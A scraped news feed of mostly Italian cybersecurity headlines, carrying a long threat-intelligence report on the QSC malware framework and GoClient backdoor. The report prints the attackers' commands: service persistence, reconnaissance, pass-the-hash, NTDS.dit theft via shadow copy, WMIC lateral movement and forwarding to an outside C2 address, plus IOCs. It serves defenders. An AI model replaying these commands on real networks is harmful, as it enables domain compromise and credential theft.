La fiducia nella cyber security passa dalla trasparenza: il ruolo dei fornitori
@Informatica (Italy e non Italy 😁)
Più un'organizzazione è trasparente, nei processi come nella cultura, e più le probabilità che sia rigorosa nei suoi processi produttivi aumentano. La trasparenza è un elemento fondamentale, poiché contribuisce a creare fiducia tra
Informatica (Italy e non Italy 😁) reshared this.
NIS2, le linee guida ENISA per l’implementazione in azienda: i punti essenziali
ENISA ha avviato la consultazione pubblica della sua guida pratica per la cyber sicurezza delle organizzazioni europee secondo la direttiva NIS2. Un documento importante su cui le stesse organizzazioni potranno implementare il loro piano di conformità normativa. Ecco i punti cardine
L'articolo NIS2, le linee guida ENISA per l’implementazione in azienda: i punti essenziali proviene da Cyber Security 360.
La fiducia nella cyber security passa dalla trasparenza: il ruolo dei fornitori
Più un'organizzazione è trasparente, nei processi come nella cultura, e più le probabilità che sia rigorosa nei suoi processi produttivi aumentano. La trasparenza è un elemento fondamentale, poiché contribuisce a creare fiducia tra produttori, clienti e partner. E questo è ancora più vero in relazione alla cyber security
L'articolo La fiducia nella cyber security passa dalla trasparenza: il ruolo dei fornitori proviene da Cyber Security 360.
Rapporto Clusit 2024, cyber attacchi in Italia: manifatturiero e sanità i settori più colpiti
I settori più critici dal punto di vista degli attacchi nel 2023 si sono registrati in ambito finanziario/assicurativo e manifatturiero. Ma anche la sanità è sempre più bersagliata, con attacchi in crescita di oltre l'80% in Italia. Come prepararsi al futuro, dopo l’entrata in vigore di DORA e delle altre normative
L'articolo Rapporto Clusit 2024, cyber attacchi in Italia: manifatturiero e sanità i settori più colpiti proviene da Cyber Security 360.
Rafforzare la resilienza digitale: l’AI generativa al servizio del regolamento DORA
Il Regolamento DORA rappresenta un passo significativo verso il rafforzamento della resilienza operativa nel settore finanziario. In questo senso, l’AI generativa emerge come un potente alleato in questo processo, offrendo strumenti e soluzioni innovative per affrontare le sfide poste dalla resilienza digitale
L'articolo Rafforzare la resilienza digitale: l’AI generativa al servizio del regolamento DORA proviene da Cyber Security 360.
Tra fake news e intercettazioni telefoniche: l’ombra della Cina sulle elezioni USA
Eletto il 47° presidente degli Stati Uniti d’America: torna Donald Trump a governare una delle maggiori potenze del mondo, ma dal punto di vista della sicurezza e dell’informazione come siamo arrivati all’Election Day? Cosa sappiamo e la posizione della Cina nella campagna di disinformazione
L'articolo Tra fake news e intercettazioni telefoniche: l’ombra della Cina sulle elezioni USA proviene da Cyber Security 360.
I dubbi dell’EDPB sul Data Privacy Framework: ancora tante le questioni aperte
L’European Data Protection Board ha pubblicato il primo rapporto di revisione sul Data Privacy Framework (DPF): secondo l’EDPB, le misure implementate dal DPF, sebbene migliorative, lasciano aperte questioni rilevanti sulla reale equivalenza delle garanzie offerte rispetto a quelle europee. Ecco quali
L'articolo I dubbi dell’EDPB sul Data Privacy Framework: ancora tante le questioni aperte proviene da Cyber Security 360.
Meta e il riconoscimento facciale dei vip per contrastare le truffe
I vip si ritrovano sempre più spesso inconsapevolmente volani di truffe. La loro immagine viene sfruttata per irretire gli utenti e Meta cerca di calare l’asso con il riconoscimento facciale. L’idea può essere buona, ma non è esente da limiti
L'articolo Meta e il riconoscimento facciale dei vip per contrastare le truffe proviene da Cyber Security 360.
“Intesa San Paolo avvisi subito i correntisti spiati”, che ci insegna la mossa del Garante Privacy
Il Garante privacy ha assegnato 20 giorni ad Intesa San Paolo per informare i clienti che hanno subito il data breach per l’acceso indebito di un proprio dipendente. La banca minimizza, ma dietro c'è un problema enorme, ecco perché
L'articolo “Intesa San Paolo avvisi subito i correntisti spiati”, che ci insegna la mossa del Garante Privacy proviene da Cyber Security 360.
False fatture di phishing: così i criminali sfruttano la firma elettronica di DocuSign
È stata identificata una sofisticata campagna di phishing in cui i truffatori sfruttano la fiducia riposta nella legittimità del servizio di firma elettronica DocuSign per aggirare i filtri antispam e ingannare le vittime con l’obiettivo di ottenere pagamenti fraudolenti. Ecco tutti i dettagli e come difendersi
L'articolo False fatture di phishing: così i criminali sfruttano la firma elettronica di DocuSign proviene da Cyber Security 360.
ToxicPanda truffa gli utenti Android con trasferimenti di denaro fraudolenti: come proteggersi
L'obiettivo principale di ToxicPanda è quello di avviare trasferimenti di denaro da dispositivi Android compromessi tramite l'acquisizione di account (ATO) sfruttando la tecnica dellafrode sul dispositivo (ODF). Ecco come mitigare il rischio
L'articolo ToxicPanda truffa gli utenti Android con trasferimenti di denaro fraudolenti: come proteggersi proviene da Cyber Security 360.
Leonardo cresce nel terzo trimestre. Premiate anche le collaborazioni internazionali
@Notizie dall'Italia e dal mondo
[quote]Di fronte all’aumento della richiesta di sicurezza, legata al contesto geopolitico internazionale, è cresciuta anche la domanda di sistemi, generando prospettive positive per il settore della Difesa. È quanto emerge dai risultati del terzo
Notizie dall'Italia e dal mondo reshared this.
Ask Hackaday: How Much Would You Stake On An Online Retailer
On the bench where this is being written, there’s a Mitutoyo vernier caliper. It’s the base model with a proper vernier scale, but it’s beautifully made, and it’s enjoyable to see younger hardware hackers puzzle over how to use it. It cost about thirty British pounds a few years ago, but when it comes to quality metrology instruments that’s really cheap. The sky really is the limit for those in search of ultimate accuracy and precision. We can see then why this Redditor was upset when the $400 Mitutoyo they ordered from Amazon turned out to be nothing of the sort. We can’t even call it a fake, it’s just a very cheap instrument stuffed oddly, into a genuine Mitutoyo box.
Naturally we hope they received a refund, but it does raise the question when buying from large online retailers; how much are we prepared to risk? We buy plenty of stuff from AliExpress in out community, but in that case the slight element of chance which comes with random Chinese manufacture is offset by the low prices. Meanwhile the likes of Amazon have worked hard to establish themselves as trusted brands, but is that misplaced? They are after all simply clearing houses for third party products, and evidently have little care for what’s in the box. The £30 base model caliper mentioned above is an acceptable punt, but at what point should we go to a specialist and pay more for some confidence in the product?
It’s a question worth pondering as we hit the “Buy now” button without thinking. What’s your view? Let us know in the comments. Meanwhile, we can all be caught with our online purchases.
Thanks [JohnU] for the tip.
Lezioni di Storia della filosofia (Educazione sociale e tecniche dell’intervento educativo) dei giorni 5 e novembre 2024
Su E Learning Unisalento – Storia della filosofia (cui gli studenti sono pregati di iscriversi mediante mail istituzionale unisalento e con la pw fornita dagli uffici) trovate la lezione del giorn…fabiosulpizioblog
Lezione di Storia della filosofia francese (Corso di laurea in Filosofia) del giorno 8 novembre 2024
Sono disponibili la prima e la seconda lezione di Storia della filosofia francese (corso di laurea in Filosofia) del giorno 8 novembre 2024. Il corso, intitolato “Percorsi di metafisica nel Novece…fabiosulpizioblog
ISRAELE. Nuove leggi permetteranno l’ergastolo per i bambini arabi
@Notizie dall'Italia e dal mondo
La Knesset ha votato per la punibilità dei minori palestinesi di 12 anni e per la deportazione dei familiari di persone accusate di terrorismo
L'articolo ISRAELE.pagineesteri.it/2024/11/08/med…
Notizie dall'Italia e dal mondo reshared this.
Non ci stiamo nemmeno provando - Episodio 2: il data breach e la comunicazione agli interessati.
@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/non-ci-s…
Prendo spunto da un recente fatto di cronaca,
Privacy Pride reshared this.
Time to Move Beyond Network Fees and Focus on Real Digital Growth [Promoted content]
Will Virkkunen finally put to rest the network fees ideas to focus on what really matters for the Internet ecosystem and EU citizens? Information Labs’ research certainly points in that direction.
QSC: A multi-plugin framework used by CloudComputating group in cyberespionage campaigns
Introduction
In 2021, we began to investigate an attack on the telecom industry in South Asia. During the investigation, we discovered QSC: a multi-plugin malware framework that loads and runs plugins (modules) in memory. The framework includes a Loader, a Core module, a Network module, a Command Shell module and a File Manager module. It is dropped either as a standalone executable or as a payload file along with a loader DLL. In this post, we describe each component of the framework as well as its recent activity including a deployment scenario, an additional backdoor, post-compromise activity and a link to the CloudComputating group.
QSC framework components
The Loader
The Loader implant is a service DLL with the internal name
loader.dll. It contains the string “E:\project\test\qt\bin\module\loader\x64\release\loader.pdb” as its PDB path. The Loader is configured to either read code from <systemdir>\drivers\msnet or read 0x100 (256) bytes from n_600s.sys, located in the same directory as the module, to get the file path containing code. If it reads the file path from n_600s.sys, it deletes the file afterwards. The Loader then reads and decompresses code from the provided file path. It reflectively injects the decompressed code into memory and calls the exported method plugin_working. The code injected by the Loader is the Core module, which is described below.
The Core and Network modules
The Core module has an internal name,
qscmdll.dll, and exports only one method, named plugin_working. It contains the string “E:\project\test\qt\bin\module\qscmdll\x64\release\qscmdll.pdb” as its PDB path. The Loader module passes the file path that contains the compressed Network module code as one of the parameters to the Core module.
The Core module reads the Network module (from the passed file path), decompresses it and injects it into memory. The Network module is a 64-bit DLL with the internal name
qscnetwork.dll. It contains the string “E:\project\test\qt\bin\module\qscnetwork\x64\release\qscnetwork.pdb” as its PDB path. The Network module exports the methods setConfig, checkTarget and getNetWork.
The Core module, after injecting the Network module into memory, initializes it by calling its exported methods in sequence:
- setConfig: copy configuration data from the Core module to the Network module.
- checkTarget: validate configuration fields by checking that the lengths of the fields are within their size limits.
- getNetWork: prepare and get the network object from the Network module for C2 communication. The Network module uses TLS implementation from the MbedTLS library.
In some of the cases, we found that the C2 in the configuration data contained an internal/proxy IP address, which suggested that the attackers were already aware of the target network topology. The configuration file contained the following settings:
- C2 IP address;
- Port;
- Sleep time;
- Internal/Proxy IP address;
- Proxy port;
- Proxy username;
- Proxy password.
The Core module supports the following C2 commands:
Command | Description |
0x1E0001 | Send target information (e.g. computer name, user name, OS version, etc.) |
0x1E0002 | XOR decode, decompress and load the Command Shell module bytes into memory. If the File Manager module is not loaded, then load it before loading the Command Shell module. |
0x1E0003 | XOR decode, decompress and load the File Manager module bytes into memory. |
0x1E0004 | Heartbeat signal, sent every 2 minutes |
0x1E0007 | Update the code file path. Create n_600s.sys, and write 0x100 (256) bytes received from C2 to this file. |
The File Manager module
The File Manager module has the internal name
qscBrowse.dll. It contains the string “E:\project\test\qt\bin\module\qscBrowse\x64\release\qscBrowse.pdb” as its PDB path, and exports the following methods.
- destroy: Free objects relating to network connection, file browsing and file transmission.
- destroyTransmit: Free network connection and file transmit operation related objects.
- startBrowse: Browse file system.
- startTransmit: Read/write file from/to system.
- stop: Close network connection. Stop the browsing and transmitting operations.
- stopTransmit: Close network connection and stop file transmitting operations.
The Core module, after reflectively injecting the File Manager module, calls its
startBrowse method. The startTransmit exported method of the File Manager module contains functionality to read/write files from/to the system. It is called when the module executes certain commands. The File Manager module supports following C2 commands:
Command | Description |
0x0A20010 | If the sub-command is <root>, then get the logical drive letters and types in the system. Otherwise, send a list of files and folders at a specified path. |
0x0A20011 | This is similar to the previous command, but it gets a list of files and folders at a specified path with the following properties:
|
0x0A20012 | Read the file and send it to the C2. This is done by calling the startTransmit method. |
0x0A20013 | Create a file in the system and write data from the C2 to the file. This is done by calling the startTransmit method. |
0x0A20014 | Delete a file from the system. |
0x0A20015 | Move a file from an existing location to a new one. |
Command Shell module
The Command Shell module has the internal name
qscShell.dll. It contains the string “E:\project\test\qt\bin\module\qscShell\x64\release\qscShell.pdb” as its PDB path, and exports the methods below.
- destroy: Free network connection and command shell related objects.
- startShell: Spawn cmd.exe as a command shell.
- stop: Close the network connection and terminate the command shell process.
The Core module, after reflectively injecting the Command Shell module, calls its
startShell method. The Command Shell module launches %windir%\system32\cmd.exe as a shell using the CreateProcess API, and data is written to and read from the shell using pipes. If the size of the received data exceeds 0xB (11) bytes, it checks if the received data starts with one of the command strings below. If the data does not start with one of these command strings, it is written to the command shell via a pipe.
If there is no more data to receive, the command shell is closed by issuing an
exit command.
Command | Description |
.put | Create a file and write content to it. This is done by calling the startTransmit method of the File Manager module. |
.get | Read a file from the system. This is done by calling the startTransmit method of the File Manager module. |
.ctm <source_file> <dest_file> | Change a timestamp. Set LastWriteTime, LastAccessTime and CreationTime of dest_file to those of source_file. |
QSC framework and GoClient backdoor deployment
When we first discovered the QSC framework in 2021, we had insufficient telemetry to find out how the framework was deployed or who the threat actor behind it was. We continued to monitor our telemetry for further signs of the QSC framework. In October 2023, we detected multiple instances of QSC files targeting an ISP in West Asia. Our investigation found that the target machines had been infected with the Quarian backdoor version 3 (aka Turian) since 2022, and the same attackers had used this access to deploy the QSC framework starting on October 10, 2023.
In addition to the QSC framework, the attackers also deployed a new backdoor written in Golang, which we have named “GoClient”. We saw the first deployment of this GoClient backdoor on October 17, 2023. After analyzing all the artifacts from this campaign, we assess, with medium confidence, that the CloudComputating threat actor is behind the deployment of the QSC framework and the GoClient backdoor.
QSC framework deployment
In October 2023, our telemetry showed that the Quarian backdoor was used to copy
c:\windows\system32\cmd.exe to c:\windows\task.exe and launch the command shell. The batch script is executed via the command shell.net stop swprv
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\swprv\Parameters /v
ServiceDll /t REG_EXPAND_SZ /d c:\windows\system32\swprr.dll /f
sc config swprv start= auto
ping -n 120 127.0.0.1
net start swprv
As can be seen above, a service is created to launch the QSC framework loader DLL
swprr.dll.
In the same month, our telemetry indicated that yet another batch script had been executed via the Quarian backdoor, with similar commands:
net stop rasauto
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\rasauto\Parameters /v
ServiceDll /t REG_EXPAND_SZ /d $system32\rasautosvc.dll /f"
sc config rasauto start= auto
ping -n 120 127.0.0.1
net start rasauto
Just like the previous set of commands, the goal is to create a service to launch the QSC framework loader DLL
rasautosvc.dll.
About a month later, the attacker launched a command shell (
cmd.exe) using the QSC framework loader DLL file C:\Windows\System32\rasautosvc.dll, and dropped the following multiple QSC framework binaries in the specified order:
- C:\Windows\L2Schemas\update.exe (MD5 d99d97bb78929023d77d080da1b10f42)
- C:\Windows\L2Schemas\update.exe (MD5 7f89a83cda93ed3ddaa4315ea4ebba45)
- C:\Windows\L2Schemas\update.exe (MD5 d99d97bb78929023d77d080da1b10f42)
- C:\Windows\L2Schemas\update.exe (MD5 112820e9a87239c2e11ead80759bef85)
- C:\Windows\L2Schemas\update.exe (MD5 d99d97bb78929023d77d080da1b10f42)
Over the course of the next few months, more QSC framework binaries were dropped on the system via the same mechanism.
GoClient backdoor deployment
Also in October 2023, we found that the threat actor dropped and executed the GoClient backdoor file onto the affected system as
c:\programdata\usoshared\intop64.exe, again using the Quarian backdoor infection.
GoClient backdoor
The GoClient backdoor file communicates with the C2, hardcoded in the malware, via TLS. In order to initiate the communication, the malware prepares the challenge key by base64-encoding the hardcoded value of “177a7b1cf2441c7ebf626ebc7e807017” and sending it to the C2 server. If the challenge key is accepted, the C2 server sends a 16-byte value, which will be used as an RC4 key to encrypt/decrypt all subsequent messages between the malware and the server.
Next, the malware collects a list of system information (e.g. hostname, local IP, number of CPUs, etc.) from the victim’s machine in JSON format, encrypts it with an RC4 key, encodes it in base64 and sends it to the server.
The backdoor then receives a base64-encoded and RC4-encrypted, space-delimited list of command strings from the C2 server to execute on the victim’s machine.
The main C2 commands available are listed below:
Command | Description |
89562 | File manipulation. After checking available disk space on all drives and sending the information back to the C2, the backdoor can receive follow-up commands which can be:
|
98423 | Command execution. The backdoor requests additional commands from the C2. The follow-up commands below can be received:
|
dc191340 | Close the connection, delete its own module file and terminate its own process. |
26c108d6 | Create a screenshot of the machine and save on a file named cap.png. |
Post-compromise activity using the GoClient backdoor
As mentioned above, the GoClient backdoor can be used to execute commands on a target system. This functionality was frequently used by the attackers. For example, they dropped the legitimate
rar.exe file in c:\inetpub\temp\ and uploaded a batch script, 1.bat, to the same location. Next, according to our telemetry, they executed 1.bat. The batch script contains the following commands:ping www.google.com -n 2
File Create("c:\inetpub\temp\a.dat");
systeminfo
ipconfig /all
netstat -ano -p tcp
tasklist /svc
net start
net view
arp -a
net localgroup administrators
reg query hkey_users
netsh firewall show config
net group /domain
net group "domain controllers" /domain
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings"
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BITS
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BITS\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\appmgmt
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\appmgmt\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\rasauto
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\rasauto\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\swprv
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\swprv\parameters
reg add
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v
LocalAccountTokenFilterPolicy /t REG_DWORD /d 0x1 /f
c:\inetpub\temp\rar.exe a c:\inetpub\temp\s.rar c:\inetpub\temp\*.dat
As can be seen from the list of executed commands, the attackers are primarily interested in collecting system information. Only at the end do they disable UAC remote restrictions and compress the harvested data with the previously uploaded
rar.exe utility.
Post-compromise activity using the QSC framework
The QSC framework was also leveraged to execute a series of commands to find the domain controller on the network, the file server and other machines as shown below. The domain controller was queried to view the list of users within the groups “domain controllers” and “domain computers”:
net group /domain
net group "domain controllers" /domain
ping dc01 -n 1"
ping dc02 -n 1"
net group "domain computers" /domain
ping 172.19.19.1 -n 1
ping 172.19.19.2 -n 1
tracert 172.19.19.2
netstat -ano
ping -a 172.17.104.102 -n 1
netstat -ano
findstr 172.19
ping -n -a fileserver
ping -n 1 -a fileserver
The attackers then dropped a tool to c:\Windows\L2Schemas\we.exe. We could not obtain a copy of
we.exe, but it was used to log in to the domain controller machine using the “pass the hash” technique and execute commands remotely:we.exe -hashes aad3b435b51404eeaad3b435b51404ee:621a23dd771b1eb39c954cd6828aee6c
<user_name>@<domain_controller_ip> "whoami"
we.exe -hashes aad3b435b51404eeaad3b435b51404ee:621a23dd771b1eb39c954cd6828aee6c
<domain>/<user_name>@<domain_controller_ip> -dc-ip <domain_controller_ip> "whoami"
wm.exe -hashes aad3b435b51404eeaad3b435b51404ee:621a23dd771b1eb39c954cd6828aee6c
<domain>/<user_name>@<domain_controller_ip> "whoami" -with-output
Next, the actor tried to list the users under the group “domain admins”:
net group "domain admins" /domain
One of the domain admin accounts was used by the attacker to remotely execute various commands on the domain controller and other machines using WMIC. Commands were executed to obtain the network configuration, and a shadow copy of the C: drive and the NTDS database. All information thus collected was then stored at user\downloads\1.txt on the domain controller:
wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c ipconfig >>$user\downloads\1.txt"
wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call
create "vssadmin create shadow /for=C: >> $user\downloads\1.txt"
wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call
create "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\NTDS.dit
$user\downloads"
wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call
create "vssadmin delete shadows /for=c: /quiet"
Lateral movement (deploying the QSC framework)
By using WMIC and the stolen domain admin credentials, the attackers were able to execute the QSC framework on other machines within the affected network. We found multiple instances during our investigation where the attackers used WMIC to remotely run either a QSC framework loader DLL or a QSC framework executable on a target machine.
We found that the QSC framework sample
update.exe (MD5 d99d97bb78929023d77d080da1b10f42) was configured to use a local IP address (pivot machine address 172.17.99[.]5:8080) as a C2 address. Similarly, the sample update.exe (MD5 7f89a83cda93ed3ddaa4315ea4ebba45) was configured to use an internal IP address (pivot machine address 172.17.99[.]5:80) but run on port 80. This might suggest either that these samples were deployed on machines without internet access or that the threat actor decided to channel all C2 communication through selected machines for other reasons.
Just after executing each instance of the above QSC framework samples on the remote machine, the attacker executed
%windir%\l2schemas\pf.exe on the pivot machine. While we could not obtain a copy of pf.exe, it seemed to perform port forwarding operations to forward any traffic coming to the pivot machine’s local IP address on port 8080/80 to the remote C2 server address 108.61.206[.]206 on port 8080.wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c %temp%\update.exe"
%windir%\l2schemas\pf.exe tcp listen:0.0.0.0:8080 conn:108.61.206[.]206:8080
tasklist
findstr pf.exe
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c taskkill /im net.exe /f"
net view \\<internal_ip>
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c tasklist >>
D:\fileserver\public\applications\drivers\apple\1.txt"
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c taskkill /im update.exe /f >>
D:\fileserver\public\applications\drivers\apple\1.txt"
taskkill /im pf.exe /f
netsh firewall show state
netsh firewall show config
netsh firewall delete portopening tcp 8080
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c %temp%\update.exe"
%windir%\l2schemas\pf.exe tcp listen:127.0.0.1:80 conn:108.61.206[.]206:8080"
tasklist
findstr pf.exe
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c taskkill /im update.exe /f >>
D:\fileserver\public\applications\drivers\apple\1.txt"
netstat -anb
netstat -anb -p tcp
netsh firewall show state
netstat -anb -p tcp
findstr 15001
netstat -anb -p tcp
findstr 8080
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c %temp%\update.exe"
%windir%\l2schemas\pf.exe tcp listen:127.0.0.1:8080 conn:108.61.206.206:8080
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c netstat -ano -p tcp
>>D:\fileserver\public\applications\drivers\apple\1.txt"
ping -n 1 108.61.206[.]206
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create
"system32\cmd.exe /c ping -n 1 40.113.110[.]67
>>D:\fileserver\public\applications\drivers\apple\1.txt"
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c tasklist
>>D:\fileserver\public\applications\drivers\apple\1.txt"
ping -n 1 40.113.110[.]67
taskkill /im pf.exe /f
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c ping -n 1 <internal_ip_2>
>>D:\fileserver\public\applications\drivers\apple\1.txt"
%windir%\l2schemas\pf.exe tcp listen:0.0.0.0:8080 conn:108.61.206[.]206:8080
net use \\<internal_ip_2> <user_password> /u:<user_name>
tasklist
findstr update.exe
net use * /d /y
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "%windir%\l2schemas\update.exe"
wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c tasklist
>>D:\fileserver\public\applications\drivers\apple\1.txt"
"wmic /node:<internal_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c netstat -ano -p tcp
>>D:\fileserver\public\applications\drivers\apple\1.txt"
%windir%\l2schemas\pf.exe tcp listen:0.0.0.0:8080 conn:108.61.206[.]206:8080
Attribution
We found multiple artifacts that helped us in attributing the QSC framework and the activity described above to the CloudComputating (aka BackdoorDiplomacy, Faking Dragon) group:
- On February 23, 2024, our product detected the presence of the file C:\Windows\SysWOW64\appmgmt.dll (MD5 97b0a8e8d125e71d3d1dd8e241d70c5b). This DLL file is Quarian backdoor version 3 (aka Turian), compiled on Thursday, 28.04.2022 02:59:40 UTC. Quarian backdoor version 3 (aka Turian) was used to deploy the QSC framework and GoClient backdoor as described above.
- The Quarian backdoor sample C:\Windows\SysWOW64\appmgmt.dll (MD5 97b0a8e8d125e71d3d1dd8e241d70c5b) was configured to use the domain “proxy.oracleapps[.]org”, which was previously used by BackdoorDiplomacy as reported by Bitdefender in their report, “Cyber-Espionage in the Middle East: Investigating a New BackdoorDiplomacy Threat Actor Campaign“.
- The Quarian backdoor sample code is protected by VMProtect. After unpacking it, our KTAE (Kaspersky Threat Attribution Engine) attribution engine found a high degree of similarity with the CloudComputating group’s other malware.
Kaspersky Threat Attribution Engine analysis - We observed that the Quarian backdoor V3 sample C:\Windows\SysWOW64\appmgmt.dll (MD5 97b0a8e8d125e71d3d1dd8e241d70c5b) shell command created a copy of cmd.exe in the Windows directory with task.exe as the filename.
- In this campaign, we found C:\ProgramData\USOShared\ to be a common directory which contained the QSC framework, the GoClient backdoor, Quarian backdoor version 3 binaries and tools used in reconnaissance and post-compromise activity. This also helps in tracing all the implants and tools to the CloudComputating group. Some of the tools, such as TailorScan and StowProxy, are known to have been used by CloudComputating in past activity discovered in the Middle East.
MD5 FilePath Comment 7a5a354b4ee40d694d7935f5
061fbd06C:\ProgramData\USOShared
\msvcen.exeQSC framework 5eba7f8a9323c2d9ceac9a0f
91fad02fC:\ProgramData\USOShared
\intop64.exeGoClient backdoor 0fe65bbf23b0c589ad462e84
7e9bfcafC:\ProgramData\USOShared
\ts6.exeTailorScan. Executed by
Quarian backdoor50be5e66a94a25e61d61028d
b6a41007C:\ProgramData\USOShared
\agt.exeStowProxy. Executed by
Quarian backdoor6a09bc6c19c4236c0bd8a019
53371a29C:\ProgramData\USOShared
\pdp.exeProcDump. Executed by
Quarian backdoorefbdfeea6ececf08f24121d5
d444b751C:\ProgramData\USOShared
\to0.exeExecuted by Quarian
backdoor. Could not get
copy of the sample567b921d9757928a4bd137a0
8cfff06bC:\ProgramData\USOShared
\fn.exeExecuted by Quarian
backdoor. Could not get
copy of the sample
Conclusions
Our investigation has revealed a significant shift in the tactics of the CloudComputating group, marked by their adoption of the QSC framework alongside the previously identified Quarian backdoor and its variants. Our telemetry data indicates that the group has initiated limited yet targeted campaigns using QSC framework and focusing specifically on the telecommunication sector. Additionally, in response to detection of the Quarian backdoor, the group has begun deploying a protected version. The usage of the QSC framework suggests a strategic change in their toolkit, serving as a secondary means to maintain access within compromised networks. This evolution underscores the group’s adaptability and emphasizes the importance of continuous monitoring of its future activities.
QSC is a modular framework, of which only the initial loader remains on disk while the core and network modules are always in memory. Using a plugin-based architecture gives attackers the ability to control which plugin (module) to load in memory on demand depending on the target of interest.
IOCs
QSC framework Loader
d88ef85941ec6be99fd1e38ad5702bae
6da5b3bc89a6d83bc80b462c29f1715b
de4e76c9c5916570e75411aab7141f73
QSC framework executable
c687b0b8a8cc86638b53ca6d66ede382
d3749cef1a91a0a80a013d5a8b2c28d1
d99d97bb78929023d77d080da1b10f42
4dde0699dd21b16afa38be92efcfec61
112820e9a87239c2e11ead80759bef85
7a5a354b4ee40d694d7935f5061fbd06
0f0b8d2f648a4609cf2f6decd3407c8c
3dbc5b5e5f6713b9a6b838da25075187
GoClient backdoor
5eba7f8a9323c2d9ceac9a0f91fad02f
9da4b88a6b80db85c102ce8c841f0a5c
b581c0835934460719181afd9abf5a4e
Quarian backdoor version 3 (aka Turian)
97b0a8e8d125e71d3d1dd8e241d70c5b
a83a869df90acb5344a6e9b11e5f6e74
Batch scripts to deploy QSC framework DLL
76caef183ad0c869f3cb8b474f6a0fd7
3d62eee8d7fe5d6c86946a4e14db784f
Batch scripts dropped by GoClient backdoor to collect victim information
23351bc0b2be2ffb946de2bf7770df2e
23313406b64e1d0e8ec4a3c173ceda21
Tools used in post-compromise activity
b09cf30e7f0e326c9127047bdf518d05
eaff84466e086e9ca204e0548af3fbeb
ee4cb0891056c89b61b3ff3c8040a994
efbdfeea6ececf08f24121d5d444b751
567b921d9757928a4bd137a08cfff06b
File paths
C:\Windows\L2Schemas\update.exe
C:\Windows\L2Schemas\update64.exe
C:\ProgramData\USOShared\msvcen.exe
c:\ProgramData\package cache\{d401961d-3a20-3ac7-943b-6139d5bd490a\dwn.exe
C:\Windows\System32\audio.dll
C:\Windows\System32\rasautosvc.dll
C:\Windows\L2Schemas\audio.dll
C:\programdata\usoshared\intop64.exe
C:\ProgramData\usoprivate\updatestore\intop64.exe
C:\ProgramData\package cache\{010792ba-551a-3ac0-a7ef-0fab4156c382}v12.0.40664\csrs.exe
C:\Windows\SysWOW64\appmgmt.dll
C:\Windows\L2Schemas\w3wpt.exe
C:\Windows\L2Schemas\we.exe
C:\Windows\L2Schemas\pf.exe
C:\Windows\L2Schemas\pt.exe
C:\Windows\L2Schemas\onlytcp.exe
C:\ProgramData\USOShared\to0.exe
C:\ProgramData\USOShared\fn.exe
C:\Windows\SysWOW64\drivers\c.bat
C:\Windows\SysWOW64\drivers\c.bat
C:\Windows\Temp\c.bat
c:\inetpub\temp\1.bat
C:\Windows\L2Schemas\E.bat
PDB paths
C:\Users\abc\Desktop\vs\bin\module\qscexec\x64\release\qscexe.pdb
C:\Users\abc\Desktop\vs\bin\module\qscexec\x64\release\qscexe.pdb
C:\Users\abc\Desktop\vs\bin\module\qscexec\release\qscexe.pdb
C:\Users\abc\Desktop\vs\bin\module\qscexec\x64\release\qscexe.pdb
C:\Users\pig\Documents\qs-domainless\bin\module\qscexec\x64\release\qscexe.pdb
C:\Users\abc\Desktop\vs\bin\module\loader\x64\release\loader.pdb
Domains and IPs
www.numupdate[.]com
www.pubsectors[.]com
www.delhiopera[.]com
asistechs[.]com
sanchaar[.]net
108.61.206[.]206
www.birdsvpn[.]com
newsinlevel[.]cc
ENISA avvia la consultazione pubblica: Guida tecnica per rafforzare le misure di cybersicurezza delle organizzazioni europee
L’Agenzia dell’Unione Europea per la Cybersecurity (ENISA) ha recentemente pubblicato una bozza di guida tecnica destinata alle organizzazioni europee per implementare le misure di sicurezza informatica previste dalla Direttiva NIS2. Questa guida, redatta in collaborazione con la Commissione Europea e il Gruppo di Cooperazione NIS, è stata rilasciata sotto forma di Regolamento di Esecuzione (UE) 2024/2690 del 17 ottobre 2024, ed è ora disponibile per la consultazione pubblica.
